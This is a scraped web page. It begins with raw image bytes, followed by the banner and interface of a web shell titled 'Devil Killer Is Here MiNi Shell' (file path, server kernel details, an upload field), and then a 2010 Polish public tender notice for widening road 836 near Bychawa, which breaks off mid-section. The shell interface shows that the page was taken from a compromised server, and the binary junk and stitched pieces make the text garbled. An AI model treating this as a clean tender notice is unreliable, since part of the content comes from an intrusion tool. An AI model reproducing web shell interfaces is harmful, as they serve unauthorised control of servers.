JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100416/87359-N-2010.html

<p class="kh_header"><b>Bychawa: Rozbudowa drogi wojewódzkiej Nr 836 Bychawa - Kol. Kębłów na odcinku od km 17+200 do km 21+100 o dł. 3,9 km</b><br>
<b>Numer ogłoszenia: 87359 - 2010; data zamieszczenia: 16.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Lublinie z/s w Bychawie , ul. Antoniego Budnego 5, 23-100 Bychawa, woj. lubelskie, tel. 081 5661393 w. 28, faks 081 5660256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa drogi wojewódzkiej Nr 836 Bychawa - Kol. Kębłów na odcinku od km 17+200 do km 21+100 o dł. 3,9 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest robota budowlana :
Rozbudowa drogi wojewódzkiej Nr 836 Bychawa - Kol. Kębłów na odcinku od km 17+200 do km 21+100 o dł. 3,9 km
CPV:
45100000-8  Przygotowanie terenu pod budowę
45230000-8 Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektrotechnicznych, autostrad, dróg, lotnisk i kolei, wyrównywanie terenu
45231300-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów do  
 odprowadzania ścieków
45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania 
 nawierzchni autostrad, dróg
45233200-1 Roboty w zakresie różnych nawierzchni
45233280-5 Wznoszenie barier drogowych
45231600-1 Roboty budowlane w zakresie budowy linii komunikacyjnych
45232000-2 Roboty pomocnicze w zakresie rurociągów i kabli
45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych
Zamówienie obejmuje wykonanie następujących robót przy drodze wojewódzkiej Nr 836 Bychawa - Kol. Kębłów w km 17+200 - 21+100:
I. BRANŻA DROGOWA
a)	roboty drogowe
-	roboty pomiarowe
-	wycinka drzew
-	karczowanie krzewów
-	usunięcie humusu gr. 20 cm ( zagospodarowanie we własnym zakresie)
-	rozbiórka wiat przystankowych
-	rozbiórka nawierzchni z mas mineralno-bitumicznych
-	rozbiórka nawierzchni z kostki
-	rozbiórka przepustów rurowych
-	rozbiórka podbudowy z kruszywa
-	rozbiórka ogrodzeń
-	oczyszczenie przepustów rurowych z namułu
-	roboty ziemne - wykopy, nasypy 
-	wykonanie stopni na skarpach nasypów
-	humusowanie i obsianie skarp
-	wykonanie przepustów o średnicy 80 i 100 cm
-	rozebranie i odtworzenie nawierzchni po przekopach pod przepusty
-	profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni
-	ułożenie geosiatki o sztywnych węzłach, masa pow. 300g/m2
-	oczyszczenie i skropienie warstw konstrukcyjnych nawierzchni
-	podbudowa z kruszywa naturalnego 0/63 mm stabilizowanego mechanicznie     gr. 25 cm
-	podbudowa z kruszywa łamanego 0/31,5 mm z dodatkiem cementu 3% stabilizowanego mechanicznie gr. 15+10 cm
-	wyrównanie istniejącej nawierzchni kruszywem łamanym 5/31 mm, stabilizowanym mechanicznie
-	podbudowa z BA 0/25 mm gr. 10 mm
-	warstwa wiążąca z BA 0/20 mm gr. 8 cm
-	warstwa ścieralna z BA 0/16 mm gr. 5 cm
-	umocnienie skarp i dna kanałów płytami prefabrykowanymi typu KRATA 60x40x10
-	wykonanie przepustów rurowych o średnicy 60 cm pod zjazdami 
-	wykonanie cokołów, ogrodzeń z siatki oraz bram wjazdowych
-	ustawienie krawężników 20x30 na ławie betonowej
-	ustawienie obrzeży 30x8
-	budowa zatok autobusowych
-	budowa chodników z kostki brukowej betonowej gr. 6 cm
-	ułożenie ścieków z prefabrykowanych elementów betonowych
-	wykonanie nawierzchni zjazdów z kruszywa łamanego, stabilizowanego mechanicznie
-	wykonanie nawierzchni zjazdów z BA 0/16 mm
-	ustawienie barier drogowych stalowych
-	wykonanie kanału z rur typu PVC łączonych na wcisk O 500x14,9 mm  z uszczelką, klasy S
-	montaż studni rewizyjnych z kręgów betonowych o średnicy 1 200 mm
-	montaż studzienek ściekowych o średnicy 500 mm z osadnikiem bez syfonu
-	kanały z rur typu PVC łączonych na wcisk O 200X5,9 mm klasy S
    b) stała organizacja ruchu:
-	pionowe znaki drogowe - słupki z rur stalowych O 60 mm
-	pionowe znaki drogowe znaki zakazu, nakazu, ostrzegawcze i informacyjne
-	pionowe znaki drogowe - słupki prowadzące z grupy U
-	oznakowanie poziome jezdni - linie segregacyjne, krawędziowe, na skrzyżowaniach i przejściach dla pieszych
II. BRANŻA TELETECHNICZNA
-	rozebranie istniejącej nawierzchni
-	przekładanie kabla doziemnego
-	układanie rur ochronnych z PCW A110PS i A160PS
-	odtworzenie istniejącej nawierzchni
III. ODPROWADZENIE WÓD OPADOWYCH OD PRZEPUSTU 2O100 W KM 19+992,59 PRZY UWZGLĘDNIENIU PRZEJŚCIA PRZEZ DZIAŁKĘ NR 167 I 169 ROWEM KRYTYM (WG WARIANTU LA)
a)	Grobla
-	roboty pomiarowe
-	wycinka drzew
-	karczowanie krzewów
-	roboty ziemne - wykopy
-	formowanie grobli
-	ułożenie geowłókniny 200g/m2
-	zabezpieczenie skarp płytami ażurowymi typu KRATA z wypełnieniem
-	zabezpieczenie rynny terenowej kratą GEOWEB z wypełnieniem
-	obsiew nasypu grobli mieszanką traw
b) Przepust
-	roboty ziemne - wykopy
-	wykonanie ław fundamentowych pod przepusty
-	kanały z rur polietylenowych typu PEHD-SPIRO o średnicy nominalnej 900 mm
-	kołnierz PEHD o średnicy nominalnej 1 215 mm
-	obsypka rur piaskiem
-	wykonanie ścianek czołowych żelbetowych
IV. BRANŻĄ TELETECHNICZNA - BUDOWA ROWU DLA ODPROWADZENIA WÓD   
    OPADOWYCH OD PRZEPUSTU 2O100 POD DROGĄ WOJEWÓDZKĄ NR 836 W KM 19+992,59 W M. MAJDANEK KOZICKI
-	wykonanie przepustu z rury dwudzielnej A120PS
-	wykonanie przepustów z rury HPDE 110/6,3
-	układanie kabla 50x4x0,5 w rowie kablowym
-	układanie kabla 2x2x0,5 w powłoce termoplastycznej do rur
-	montaż złączy kablowych
-	pomiary
V. BRANŻA ZIELEŃ
-	nasadzenia drzew
-	nasadzenia krzewów
2. Szczegółowy zakres robót ujęty jest w projektach budowlanych i wykonawczych 
w Szczegółowych Specyfikacjach Technicznych oraz w przedmiarze  robót stanowiącym część pomocniczą  do określenia ilości robót.
3. Wykonawca zobowiązany jest do opracowania i zatwierdzenia planu bezpieczeństwa  
i ochrony zdrowia , programu zapewnienia jakości.
4. W załączeniu do oferty Wykonawca złoży wstępny harmonogram robót natomiast  szczegółowy harmonogram rzeczowo - finansowy i harmonogram płatności Wykonawca złoży w terminie  14 dni od daty podpisania umowy. 
5. Zgodnie z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy).
6. Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków ruchu drogowego kołowego i pieszego w rejonie prowadzonych robót objętych umową, na podstawie  projektu czasowej organizacji ruchu (dostarczonego przez Zamawiającego).  
7. W razie potrzeby Wykonawca na własny koszt i we własnym zakresie dostosuje istniejący projekt czasowej organizacji ruchu do technologii robót.
8. W związku z brakiem możliwości określenia nośności nawierzchni drogi wojewódzkiej  Nr 836 od km 0+000 do km 17+200, Wykonawca zobowiązany jest do transportu wszelkiego rodzaju materiałów niezbędnych do przebudowy drogi wojewódzkiej od strony drogi krajowej Nr 17, od m. Piaski. Wielkość lub zakres zamówienia:12410347,08 zł. netto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające polegać będzie na powtórzeniu tego samego rodzaju zamówienia. Wielkość lub zakres zamówień uzupełniających: nie więcej niż 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.00.00-8, 45.23.13.00-8, 45.23.30.00-9, 45.23.32.00-1, 45.23.32.80-5, 45.23.16.00-1, 45.23.20.00-2, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości: 65.000,00 zł, słownie złotych: sześćdziesiąt pięć tysięcy 00/100.
2.Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo zamówień publicznych.
3.Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW 
w Lublinie w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000.
4.W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1.Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez zamawiającego. W myśl art. 63. ust. 3 pkt.1  ustawy Prawo bankowe z dnia 29 sierpnia 1997 (Dz. U z 2002 Nr 72 poz. 665 j. t.) polecenie przelewu jest jedną 
z form rozliczenia bezgotówkowego.  Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. 
Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2.Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za wniesione 
w terminie jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  winien wykonać w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 zadań polegających na budowie, przebudowie i rozbudowie dróg nie niższej niż klasy Z o wartości nie mniejszej niż 10 000 000 PLN (netto) każda. Jako zakończenie realizacji  należy rozumieć doprowadzenie wykonywanej inwestycji do oddania przez Wykonawcę i odebrania jej przez Inwestora</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien dysponować jednostkami sprzętu i środkami transportu wymienionymi poniżej:
Lp.	Opis(typ/model/parametry)	Wymagana liczba(minimum)
1.	Koparka o pojemności łyżki 0,25 m3 i więcej	4
2.	Ładowarka o pojemności łyżki0,75 m3	1
3.	Równiarka o mocy 75 KM	2
4.	Samochód skrzyniowy o ładowności 5 t lub więcej	2
5.	Samochód samowyładowczy o ładowności min. 10 t       (z możliwością przykrycia  brezenetem)	5
6.	Żuraw samochodowy o udźwigu 5-6 t	1
7.	Ubijaki mechaniczne lub małe walce wibracyjne	2
8.	Zagęszczarki mechaniczne	4
9.	Walec samojezdny ogumiony średni	2
10.	Walec samojezdny stalowy statyczny 10 t	2
11.	Walec samojezdny stalowy 15 t	2
12.	Skrapiarka do bitumu	1
13.	Rozkładarka mas bitumicznych z możliwością wstępnego zagęszczenia, z możliwością ułożenia nawierzchni maksymalnie dwoma przejściami na całej szerokości, z elektronicznym sterowaniem, wyposażona w urządzenia pomiarowo-kontrolne	1
14.	Frezarka drogowa ze sterowaniem elektronicznym lub mechanicznym	1
15.	Wytwórnia mas bitumicznych o wydajności min 100 Mg/h*	1
W przypadku udostępnienia potencjału technicznego przez inny podmiot do wykazu należy dołączyć jego pisemne zobowiązanie do oddania do dyspozycji niezbędnego potencjału technicznego na okres korzystania z niego przy wykonaniu zamówienia.
Uwaga! Zamawiający wymaga wskazania lokalizacji wytwórni mas bitumicznych. Lokalizacja winna spełniać warunek czasu transportu mas bitumicznych od momentu załadowania do momentu rozpoczęcia rozładunku (do 2 godz.). W przypadku wątpliwości spełnienia tego warunku Zamawiający zastrzega sobie możliwość praktycznego sprawdzenia. Odległość należy liczyć od wytwórni do najdalszego miejsca robót po drogach umożliwiających przejazd samochodów o ładowności minimum 10 ton</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien dysponować minimum po jednej osobie przewidzianej do pełnienia funkcji:
a) kierownika budowy -  z minimum 5 letnim doświadczeniem w pracy na stanowisku kierownika budowy/robót posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej. 
b)kierownika robót - posiadającą uprawnienia budowlane do kierowania robotami budowlanymi  bez ograniczeń w specjalności instalacyjnej w zakresie sieci i urządzeń wod. kan.
c)kierownika robót - posiadającą uprawnienia budowlane do kierowania robotami budowlanymi  bez ograniczeń w specjalności telekomunikacyjnej.
W przypadku udostępnienia osoby/ób zdolnej/ych do wykonania zamówienia przez inny podmiot/y do oferty należy dołączyć pisemne zobowiązanie tego podmiotu/ów do jej/ich udostępnienia.
W/w osoby  przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane  zgodnie z ustawą prawo budowlane z dnia 7 lipca 1994 r. (z póź. zmianami) art.12 ustęp1 ppkt2,ustęp7, art.12a  lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy prawo budowlane z 1994 r, natomiast w przypadku osób które uzyskały uprawnienia w innych krajach Unii Europejskiej posiadane uprawnienia muszą spełniać warunki określone  w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.Nr 63,poz.394)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnianie warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument potwierdzający wniesienie wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
